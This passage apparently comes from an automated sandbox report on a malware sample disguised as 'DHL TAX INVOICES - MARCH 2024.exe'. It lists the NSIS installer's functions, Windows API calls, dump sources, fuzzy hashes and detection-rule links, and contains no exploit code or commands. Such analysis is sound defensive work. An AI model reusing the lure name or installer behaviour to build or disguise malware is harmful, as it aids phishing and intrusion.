                                                            • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                            • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,?,0040B5D8,000000FF,C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidelstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll
                                                            • API String ID: 3109718747-3756960130
                                                            • Opcode ID: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
                                                            • Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
                                                            • Opcode Fuzzy Hash: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
                                                            • Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040604B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,ExecToStack,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00406075
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00406096
                                                            • RegCloseKey.ADVAPI32(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 004060B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: ExecToStack
                                                            • API String ID: 3677997916-166031814
                                                            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
                                                            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405B32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3081826266
                                                            • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
                                                            • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                              • Part of subcall function 0040585E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                              • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3585118688-0
                                                            • Opcode ID: 74bb8869648c35fd16b063611755013e952a71dae8eb69fe35b11bf96a1a4cfc
                                                            • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                            • Opcode Fuzzy Hash: 74bb8869648c35fd16b063611755013e952a71dae8eb69fe35b11bf96a1a4cfc
                                                            • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004038D5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                            • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsi41AC.tmp, xrefs: 0040390B
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi41AC.tmp
                                                            • API String ID: 2962429428-1167774919
                                                            • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                            • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
                                                            • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                            • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403C9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$1033
                                                            • API String ID: 530164218-2847381411
                                                            • Opcode ID: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                            • Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
                                                            • Opcode Fuzzy Hash: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                            • Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405C3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405BEB
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405C93
                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0), ref: 00405CA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: 0_B
                                                            • API String ID: 3248276644-2128305573
                                                            • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                            • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
                                                            • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                            • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00405280
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                            • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
                                                            • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                            • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040585E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                            • CloseHandle.KERNEL32(?), ref: 00405894
                                                            Strings
                                                            • Error launching installer, xrefs: 00405871
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                            • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                            • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                            • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405B84
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405B94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
